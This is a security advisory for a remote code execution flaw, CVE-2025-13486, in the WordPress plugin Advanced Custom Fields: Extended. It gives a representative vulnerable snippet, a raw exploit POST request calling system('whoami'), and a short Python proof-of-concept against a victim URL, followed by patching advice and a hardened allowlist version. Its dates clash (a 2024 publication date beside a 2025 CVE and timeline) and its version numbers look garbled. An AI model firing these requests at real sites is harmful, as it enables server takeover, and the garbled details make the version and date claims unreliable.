Published: 2024-06-25
Affected Plugin: Advanced Custom Fields: Extended
Vulnerable Versions: .9..5 through .9.1.1
TL;DR
A critical vulnerability (CVE-2025-13486) has been found in the popular WordPress plugin, Advanced Custom Fields: Extended (“ACF Extended”). The bug allows unauthenticated users to run arbitrary PHP code on your website. If you’re running any ACF Extended version between .9..5 and .9.1.1, your site is at risk. Immediate action is needed!
What’s the Bug?
The flaw lies in the prepare_form() function. This function takes values from the request and passes them straight to call_user_func_array(), a PHP function that calls whatever function is named in its first argument with the arguments supplied in its second. Because neither the function name nor the arguments are validated, an attacker chooses what is executed on your server, without ever logging in.
Vulnerable Code Snippet
Below is a simplified example of what the code might look like (not the actual plugin source, but representative):

function prepare_form($function, $params) {
    // $function (the callable name) and $params (its argument list)
    // come directly from user input and are never validated.
    return call_user_func_array($function, $params);
}
If an attacker sends this kind of HTTP POST request:

POST /wp-admin/admin-ajax.php?action=acfe_form
Content-Type: application/x-www-form-urlencoded

function=system&params[]=whoami
…the plugin would call:

call_user_func_array('system', array('whoami'));

This runs the system('whoami') command on your server and returns the name of the account the web server runs as. Replace 'whoami' with any other command and the attacker is in control.
Proof-of-Concept (PoC) exploit:

import requests

# Target the same admin-ajax action shown in the request above.
url = "https://victimsite.com/wp-admin/admin-ajax.php?action=acfe_form"

# The two request parameters that reach call_user_func_array() unchecked.
exploit = {
    'function': 'system',
    'params[]': 'echo hacked > /tmp/hack.txt'
}

response = requests.post(url, data=exploit)
print(response.text)
This creates a file /tmp/hack.txt containing the text hacked if the exploit worked.
How to Fix
- Update the plugin: Developers have patched this vulnerability in recent versions. Download and install the latest version from the official plugin page.
- Review custom code: If you have forked or modified ACF Extended, review any code touching call_user_func_array().
Prevention Advice
- Never trust user input: Always validate and sanitize user data _before_ using it in functions like call_user_func_array().
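To make this advice concrete, here is an added illustration (not the plugin's actual code) of the vulnerable pattern next to a hardened version that dispatches only to an allowlist of pre-registered handlers, validates the argument array, and requires a capability before anything is called. The handler names, the ACFE_FORM_HANDLERS constant and the acfe_render_* functions are hypothetical; WP_Error, current_user_can() and sanitize_text_field() are standard WordPress APIs.

```php
<?php
// Added illustration, not the plugin's code. Handler names are hypothetical.

// VULNERABLE: the request picks any function name and any argument list.
function prepare_form_vulnerable($function, $params) {
    return call_user_func_array($function, $params);
}

// HARDENED: map a short, fixed set of request keys to the only functions
// that may ever be reached through this endpoint. The user-supplied string
// is used as a lookup key, never as the callable itself.
const ACFE_FORM_HANDLERS = [
    'render_text_field'   => 'acfe_render_text_field',   // hypothetical
    'render_select_field' => 'acfe_render_select_field', // hypothetical
];

function prepare_form_hardened($function, $params) {
    // 1. Authorization first: unauthenticated admin-ajax callers stop here.
    if (!current_user_can('edit_posts')) {
        return new WP_Error('acfe_forbidden', 'Insufficient permissions.');
    }
    // 2. Exact allowlist match on the handler key (no prefixes, no callables).
    if (!is_string($function) || !array_key_exists($function, ACFE_FORM_HANDLERS)) {
        return new WP_Error('acfe_bad_handler', 'Unknown form handler.');
    }
    // 3. Arguments must be a small array of scalars; nested arrays or objects
    //    (which could themselves be interpreted as callables) are rejected.
    if (!is_array($params) || count($params) > 5) {
        return new WP_Error('acfe_bad_params', 'Invalid handler arguments.');
    }
    foreach ($params as $p) {
        if (!is_scalar($p)) {
            return new WP_Error('acfe_bad_params', 'Arguments must be scalar.');
        }
    }
    // 4. Only now dispatch, to the allowlisted target with sanitized strings.
    $target = ACFE_FORM_HANDLERS[$function];
    return call_user_func_array($target, array_map('sanitize_text_field', $params));
}
```

With this structure a request carrying function=system fails the allowlist check in step 2 and never reaches call_user_func_array(), regardless of what params[] contains.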
References and Further Reading
- Wordfence Advisory on CVE-2025-13486 *(pending official post link)*
- NIST National Vulnerability Database Entry
- ACF Extended Plugin on WordPress.org
- PHP: call_user_func_array() Manual
Final Thoughts
This vulnerability is incredibly dangerous because it gives unauthenticated attackers remote code execution, meaning anyone on the internet can exploit it if you're not patched. Take this threat seriously, update ACF Extended now, and audit your site for signs of compromise.
Stay safe & keep your WordPress updated!
*(Exclusive write-up for this discussion, please share with attribution.)*
Timeline
Published on: 12/03/2025 06:47:46 UTC
Last modified on: 12/04/2025 17:15:08 UTC